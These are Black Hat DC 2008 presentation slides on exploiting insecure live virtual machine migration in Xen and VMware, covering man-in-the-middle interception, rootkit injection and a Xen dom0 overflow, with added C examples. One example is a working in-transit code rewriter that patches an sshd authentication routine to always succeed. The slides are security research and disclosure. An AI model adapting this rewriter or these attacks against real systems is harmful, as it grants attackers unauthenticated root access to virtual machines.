Exploiting Live Virtual Machine Migration (Jon Oberheide, University of Michigan) - presentation slides

  1. Exploiting Live Virtual Machine Migration
     Jon Oberheide, University of Michigan
     February 21, 2008, Black Hat DC

  2. Game Plan
     • Introduction to VM migration
     • Live migration security
     • Exploiting live migration
     • Future attacks and wrap-up
     Slide #2 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  3. Live VM Migration
     • Transfer of a VM from one physical machine to another with little or no service downtime
     • (Figure: motivations) High Availability, Enhanced Mobility, Dynamic Load Balancing

  4. Live Migration Methodology
     • Minimize service downtime
     • Minimize migration duration
     • Migration Types:
       • Stop-and-copy (S-C)
       • Demand-migration (D-M)
       • Iterative precopy (I-P)
     • (Figure: downtime vs. duration trade-off. S-C: high downtime, low duration. D-M: low downtime, high duration. I-P: hybrid, between the two.)

  5. Stop and Copy
     • Stop source VM
     • Copy all pages over the network
     • Start destination VM
     • (Figure: Stop and Copy has the longest service downtime and the shortest migration duration)

  6. Demand Migration
     • Copy over critical OS structures
     • Start destination VM
     • Page faults trigger network copy
     • (Figure: Demand Migration has the shortest service downtime and the longest migration duration)

  7. Iterative Precopy
     • Iteratively copy pages over network
     • Keep copying dirtied pages until threshold
     • At threshold, stop source VM, copy remaining pages, start destination VM
     • (Figure: Iterative Precopy balances service downtime and migration duration)
     • Method used by VMware/Xen
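The trade-off sketched on slides 4 to 7, worked through as an added example (not code from the slides or from any hypervisor): a small model of iterative precopy next to stop-and-copy. The model is constructed for this example: pages are equal size, the link moves `bw` pages per tick, the running guest dirties `dirty` pages per tick, and the precopy loop gives up after `max_rounds`; demand migration is not modelled.

```c
#include <stdio.h>

/* One migration's outcome, in "ticks" of link time. */
struct migration {
    int rounds;       /* precopy rounds performed before the VM was stopped */
    int converged;    /* 1 if the dirty set fell to the threshold, 0 if max_rounds hit */
    double downtime;  /* time the VM is stopped (final stop-and-copy) */
    double duration;  /* total time from first copy to destination start */
};

/* Iterative precopy.  Round 1 copies every page; each later round re-sends
   the pages dirtied while the previous round was in flight.  When the dirty
   set is at most `threshold` pages (or after `max_rounds`), the source VM is
   stopped, the remaining dirty pages are copied, and the destination starts. */
struct migration precopy(double pages, double bw, double dirty,
                         double threshold, int max_rounds)
{
    struct migration m = { 0, 0, 0.0, 0.0 };
    double to_send = pages;           /* pages queued for the next round */
    int r = 0;

    while (r < max_rounds) {
        double t = to_send / bw;      /* wall time for this round */
        double dirtied = dirty * t;   /* pages written by the guest meanwhile */
        m.duration += t;
        r++;
        if (dirtied > pages) dirtied = pages;  /* cannot dirty more than exists */
        to_send = dirtied;
        if (to_send <= threshold) { m.converged = 1; break; }
    }
    m.rounds = r;
    /* Final stop-and-copy of whatever is still dirty: this is the downtime. */
    m.downtime = to_send / bw;
    m.duration += m.downtime;
    return m;
}

/* Stop-and-copy for comparison: the whole image is sent while the VM is down. */
struct migration stop_and_copy(double pages, double bw)
{
    struct migration m = { 0, 1, pages / bw, pages / bw };
    return m;
}

int main(void)
{
    struct migration a = precopy(1000, 100, 20, 10, 30);  /* dirty rate below link rate */
    struct migration b = precopy(1000, 100, 150, 10, 5);  /* dirty rate above link rate */
    struct migration c = stop_and_copy(1000, 100);
    printf("precopy (converges):  rounds=%d downtime=%.2f duration=%.2f\n",
           a.rounds, a.downtime, a.duration);
    printf("precopy (never does): rounds=%d downtime=%.2f duration=%.2f\n",
           b.rounds, b.downtime, b.duration);
    printf("stop-and-copy:        downtime=%.2f duration=%.2f\n", c.downtime, c.duration);
    return 0;
}
```

With a dirty rate below the link rate the dirty set shrinks geometrically and downtime is a fraction of a tick; with a dirty rate at or above it the set never shrinks, every round re-sends the whole image, and the migration ends with the same downtime as stop-and-copy after `max_rounds` of wasted transfer. Those repeated rounds are also what put the same guest pages on the wire several times, which is the observation behind the fingerprinting remark on slide 28.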

  8. Game Plan
     • Introduction to VM migration
     • Live migration security
     • Exploiting live migration
     • Future attacks and wrap-up

  9. A Trip Down Memory Lane
     • Physical machines
       • Machine state protected by MMU/hardware
       • Physical attacks (FireWire device DMA)
     • Virtual machines
       • VM state protected by VMM/hypervisor
       • Software attacks (weak VMM isolation)
     Can we break any more isolation boundaries?

  10. A Trip Down Memory Lane
     Of course! Functionality always trumps security!
     • Migration-enabled VMs
       • Full VM state exposed to the network
       • Trades off security for management capabilities
       • Authentication, confidentiality, isolation concerns

  11. VM Migration Security
     • Migration data plane
       • Network transit path over which migration occurs
     • Security of data plane
       • Unauthenticated, insecure migration data plane
       • Full access granted to VM state
         • OS/kernel memory
         • Application state
         • Sensitive data, passwords, keys, etc.
     • VMware and Xen migrations vulnerable

  12. Breaching the Data Plane
     • Breach of data plane means game over
       • Entire virtual machine may be compromised
       • Kernel, userspace applications, data
     • Requirement for breach
       • Manipulate traffic along migration path between source and destination VMM
       • Need to perform MITM attack
         • ARP/DHCP spoofing
         • DNS spoofing/poisoning
         • IP/route hijacking

  13. Breaching the Data Plane
     • Passive attacks
       • Snarf sensitive data, passwords, keys in memory
     • Active attacks
       • Manipulate authentication services
         • sshd, /bin/login, PAM, etc.
       • Manipulate kernel structures
         • Slip rootkits into memory

  14. Game Plan
     • Introduction to VM migration
     • Live migration security
     • Exploiting live migration
     • Future attacks and wrap-up

  15. Exploiting VM Migration
     • Xensploit
       • Non-weapons-grade proof-of-concept tool
       • Works against Xen and VMware migrations
     • Attack classes
       • VM application/userland exploits
       • OS/kernel exploits
       • VMM subversion

  16. VM Application Exploits
     • sshd authentication bypass
       • Identify pubkey authentication routines
       • Manipulate to allow unrestricted root access
       • Access wide open after migration completes
     • Cron daemon shellcode injection
       • Privileged, inconspicuous daemon
       • Inject HTTP GET + execve shellcode
       • Payload fetch/exec on next find_jobs invocation

  17. Exploitation Example: sshd authentication bypass
     • Before migration: attacker is denied access to the VM
     • During migration: Xensploit manipulates the in-memory object code of sshd as it crosses the wire
     • After migration: attacker achieves unrestricted root access to the VM

  18. Before Migration
     • Attacker attempts to gain root access to the target virtual machine via ssh
     • Attacker is denied access to the VM

  19. sshd Authentication Code
     • Source code from OpenSSH's auth2-pubkey.c (listing not reproduced in this text)

  20. During Migration
     • Xensploit manipulates the object code of sshd's authentication routines as it crosses the wire
     • Xensploit injects a mov $0x1,%eax instruction into user_key_allowed2, so that it returns 1 (true)

  21. After Migration
     • Attacker again attempts to gain root access via ssh on the target virtual machine
     • No authentication is necessary, as sshd's routines have been manipulated by Xensploit
     • Root access is granted to the attacker
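The manipulation walked through on slides 17 to 21, as an added example that is not Xensploit's code: a small in-transit rewriter of the kind a migration MITM would run on the page stream. It assumes raw guest page bytes pass through it, and it assumes a constructed prologue signature (SIG, not the bytes of any real sshd build) that marks the entry of the target routine; a real tool would take the signature from the exact binary running in the guest. The replacement is the x86 encoding of mov $0x1,%eax ; ret (b8 01 00 00 00 c3), so the routine returns 1 no matter what key was offered. Because the stream arrives in chunks, the rewriter holds back the last SIG_LEN-1 bytes of each chunk so a signature that straddles two chunks is still seen whole.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed signature for the target routine's entry: a generic frame setup
   plus a few distinctive bytes.  Not the prologue of any real sshd. */
static const uint8_t SIG[] = { 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec, 0x14, 0x8b, 0x5d, 0x08 };
#define SIG_LEN (sizeof SIG)

/* Replacement: mov $0x1,%eax ; ret  -> the routine unconditionally returns 1. */
static const uint8_t PATCH[] = { 0xb8, 0x01, 0x00, 0x00, 0x00, 0xc3 };
#define PATCH_LEN (sizeof PATCH)

struct rewriter {
    uint8_t carry[sizeof SIG - 1];  /* tail of the previous chunk that may begin a split signature */
    size_t ncarry;
    size_t patches;                 /* signatures rewritten so far */
};

void rewriter_init(struct rewriter *r) { memset(r, 0, sizeof *r); }

/* Feed one chunk of migration traffic.  Forwardable bytes are written to out
   (capacity must be at least r->ncarry + len); the last SIG_LEN-1 bytes are
   held back so a signature split across chunks is still matched.  Returns the
   number of bytes to forward now. */
size_t rewriter_feed(struct rewriter *r, const uint8_t *in, size_t len,
                     uint8_t *out, size_t outcap)
{
    size_t total = r->ncarry + len;
    if (outcap < total) return 0;           /* caller error: not enough room */
    memcpy(out, r->carry, r->ncarry);       /* held-back tail first ...     */
    memcpy(out + r->ncarry, in, len);       /* ... then the new chunk        */

    for (size_t i = 0; i + SIG_LEN <= total; ) {
        if (memcmp(out + i, SIG, SIG_LEN) == 0) {
            memcpy(out + i, PATCH, PATCH_LEN);  /* overwrite the entry in place */
            r->patches++;
            i += SIG_LEN;
        } else {
            i++;
        }
    }

    size_t keep = total < SIG_LEN - 1 ? total : SIG_LEN - 1;
    memcpy(r->carry, out + total - keep, keep);
    r->ncarry = keep;
    return total - keep;
}

/* End of stream: release whatever was held back. */
size_t rewriter_flush(struct rewriter *r, uint8_t *out, size_t outcap)
{
    size_t n = r->ncarry;
    if (outcap < n) return 0;
    memcpy(out, r->carry, n);
    r->ncarry = 0;
    return n;
}

/* Run the rewriter over a CONSTRUCTED 256-byte page image with the signature
   at offset 117, delivered in chunks of `chunk` bytes so the signature may
   straddle a chunk boundary.  Returns 1 if the reassembled output equals the
   image with SIG replaced by PATCH and exactly one patch was applied. */
int demo_split_stream(size_t chunk)
{
    enum { IMG = 256, AT = 117 };
    uint8_t img[IMG], want[IMG], got[IMG + SIG_LEN];
    if (chunk == 0) chunk = 1;
    for (size_t i = 0; i < IMG; i++)
        img[i] = (uint8_t)(0x90 + (i * 7) % 13);   /* filler; never contains 0x55 */
    memcpy(img + AT, SIG, SIG_LEN);
    memcpy(want, img, IMG);
    memcpy(want + AT, PATCH, PATCH_LEN);

    struct rewriter r;
    rewriter_init(&r);
    size_t outlen = 0;
    for (size_t off = 0; off < IMG; off += chunk) {
        size_t n = off + chunk > IMG ? IMG - off : chunk;
        outlen += rewriter_feed(&r, img + off, n, got + outlen, sizeof got - outlen);
    }
    outlen += rewriter_flush(&r, got + outlen, sizeof got - outlen);
    return outlen == IMG && memcmp(got, want, IMG) == 0 && r.patches == 1;
}

int main(void)
{
    printf("chunk=120 (signature straddles a boundary): %s\n", demo_split_stream(120) ? "patched" : "FAILED");
    printf("chunk=1   (byte at a time):                 %s\n", demo_split_stream(1) ? "patched" : "FAILED");
    return 0;
}
```

The patch lands at the routine's entry, before any frame has been pushed, which is why a bare `ret` is safe there; patching further into the function would have to preserve its epilogue. Note too that the rewrite leaves the total byte count unchanged, which matters for a migration protocol that has already announced how many page bytes follow.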

  22. VM Kernel Exploits
     • Kernel manipulation
       • Direct access to in-memory kernel image
       • More complexity but more power
       • Leverage all your DMA attack payloads
     • Stealthy backdoor drop
       • Network/syscall/ioctl trigger
     • Full-blown VMBR hoisting

  23. VMBR Hoisting
     • Virtual Machine-Based Rootkits
     • Slip in an extra virtualization layer à la SubVirt/Blue Pill/Vitriol

  24. Subverting the VMM
     • Mangle migration payload
       • Exploit a vulnerability and subvert the VMM
     • Leverage Xen dom0 vulns
       • Present in Xen daemon migration routines
       • <= 3.1.0 release vulnerable
       • Undoubtedly more...
     • Instantly own all hosted VMs
       • And all future migrated VMs!

  25. Subverting the VMM
     • Xen's libxc/xc_domain_restore.c (listing not reproduced in this text)
       • No check for signed integer j < 0
       • Stack overflow of region_pfn_type in Xen's dom0 restore code
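The flaw summarised on this slide, as an added example that is not Xen's xc_domain_restore.c: a restore-side batch reader in the same shape, with the vulnerable check beside the corrected one. MAX_BATCH_SIZE, the in-memory stream stand-in and the verdict enum are constructed for this example. In the real code read_exact() pulls from the migration socket, so a negative count turns into an unbounded copy into a fixed stack array; here the would-be overflow is reported instead of performed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MAX_BATCH_SIZE 1024   /* constructed upper bound for this example */

enum verdict { BATCH_OK, BATCH_END, BATCH_REJECTED, BATCH_WOULD_OVERFLOW };

/* In-memory stand-in for the migration socket. */
struct stream { const uint8_t *p; size_t left; };

/* Pull exactly n bytes from the stream, or fail. */
static int read_exact(struct stream *s, void *dst, size_t n)
{
    if (s->left < n) return 0;
    memcpy(dst, s->p, n);
    s->p += n;
    s->left -= n;
    return 1;
}

/* Bytes a batch of j entries asks read_exact() to deposit in the array.
   j is a signed int and sizeof yields size_t, so a negative j is converted
   to a value near SIZE_MAX before the multiply: -1 becomes SIZE_MAX-7. */
size_t requested_bytes(int j)
{
    return j * sizeof(unsigned long);
}

/* One iteration of a restore-side batch loop in the shape the slide
   describes (written for this example, not Xen's code).  With fixed == 0 only
   the upper bound is checked, so a negative sender-controlled j gets through;
   with fixed == 1 the lower bound is checked as well.  The size guard before
   the second read_exact() exists only in this demo. */
enum verdict consume_batch(struct stream *s, int fixed)
{
    unsigned long region_pfn_type[MAX_BATCH_SIZE];   /* fixed-size stack buffer */
    int j;

    if (!read_exact(s, &j, sizeof j)) return BATCH_REJECTED;
    if (j == 0) return BATCH_END;                    /* end-of-batches marker */
    if (fixed) {
        if (j < 0 || j > MAX_BATCH_SIZE) return BATCH_REJECTED;
    } else {
        if (j > MAX_BATCH_SIZE) return BATCH_REJECTED;   /* j = -1 passes this */
    }

    size_t want = requested_bytes(j);
    if (want > sizeof region_pfn_type) return BATCH_WOULD_OVERFLOW;
    if (!read_exact(s, region_pfn_type, want)) return BATCH_REJECTED;
    return BATCH_OK;
}

/* Build a constructed batch (count j followed by `payload` filler bytes) and
   run it through consume_batch(). */
enum verdict try_batch(int j, size_t payload, int fixed)
{
    static uint8_t buf[sizeof(int) + MAX_BATCH_SIZE * sizeof(unsigned long)];
    if (payload > sizeof buf - sizeof(int)) payload = sizeof buf - sizeof(int);
    memcpy(buf, &j, sizeof j);
    memset(buf + sizeof j, 0x41, payload);
    struct stream s = { buf, sizeof j + payload };
    return consume_batch(&s, fixed);
}

int main(void)
{
    printf("j=-1, upper-bound check only: verdict %d (%d = would overflow)\n",
           try_batch(-1, 64, 0), BATCH_WOULD_OVERFLOW);
    printf("j=-1, both bounds checked:    verdict %d (%d = rejected)\n",
           try_batch(-1, 64, 1), BATCH_REJECTED);
    printf("j=8,  either check:           verdict %d (%d = ok)\n",
           try_batch(8, 64, 1), BATCH_OK);
    return 0;
}
```

The fix is the explicit `j < 0` test; an equivalent alternative is to read the count into an unsigned type so the comparison against MAX_BATCH_SIZE covers both ends of the range. Either way the attacker on the migration path, who already controls every byte of the stream, loses the one value that turns a memory read into a stack smash in dom0.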

  26. Game Plan
     • Introduction to VM migration
     • Live migration security
     • Exploiting live migration
     • Future attacks and wrap-up

  27. Additional Attacks
     Lots more juice in the migration orange!
     • Fraudulent migration requests
       • Owned VMMs snarfing up VMs
     • False resource advertising
       • Migration-enabled load balancing
     • Future attacks inevitable
       • Increased functionality
       • Increased complexity
       • Increased security risk

  28. Just Encrypt It, Stupid!
     • Encryption goes a long way!
     • Fingerprinting migrations
       • Reconnaissance / targeting
       • Enabled by iterative-precopy method
       • Similar to VBR attacks
     • Increased complexity
       • Full PKI adds considerable deployment complexity
     • Not currently implemented!

  29. Vendor Response
     • VMware
       • Use separate network for migration paths
       • Use hardware-based crypto cards
       • VMotion/Virtual Infrastructure 3 vulnerable
     • XenSource
       • Consult vendor/distribution for security fixes
       • Latest open-source release still at risk
       • Unsure of migration status in XenServer 4
     • Microsoft Hyper-V
       • Will they get it right?

  30. The Big Picture
     • VM migration paradigm
       • VERY useful functionality
       • Awareness of security risk necessary
       • Better isolation, access control, authentication
     • Until then...
       • Severe weaknesses exist in extensively deployed systems
       • Valuable weapon for pentester/attacker

  31. Questions?
     • Contact info:
       • Jon Oberheide <jonojono@umich.edu>
       • PhD student, University of Michigan
       • Advisor: Farnam Jahanian
       • Research Group: http://www.eecs.umich.edu/fjgroup/
